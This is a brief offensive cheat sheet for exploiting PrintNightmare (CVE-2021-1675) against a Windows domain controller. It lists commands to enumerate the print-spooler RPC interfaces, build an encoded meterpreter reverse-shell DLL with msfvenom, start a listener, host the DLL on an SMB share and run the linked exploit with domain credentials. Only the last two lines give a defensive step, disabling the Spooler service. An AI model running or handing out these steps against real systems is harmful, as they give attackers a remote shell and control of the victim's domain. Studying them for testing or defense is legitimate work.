PrintNightmare

https://github.com/cube0x0/CVE-2021-1675

$ rpcdump.py @[dc-ip] | egrep 'MS-RPRN|MS-PAR'

Use msfvenom to create a malicious dll

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[attacker machine] LPORT=[listener port] -f dll -e x64/shikata_ga_nai -i 5 -o shell.dll

Start a meterpreter listener

msfconsole
- use multi/handler
- set payload windows/x64/meterpreter/reverse_tcp
- set lhost [attacker ip]
- set lport [listener port]

SMB Server

$ smbserver.py share `pwd` -smb2support

Run

	$ python3 [script.py] [domain]/[username]:'[password]'@[dc-ip] '\\[attacker ip]\share\shell.dll'

Defense

> Stop-Service Spooler
REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start" /t REG_DWORD /d "4" /f

Last updated 1 month ago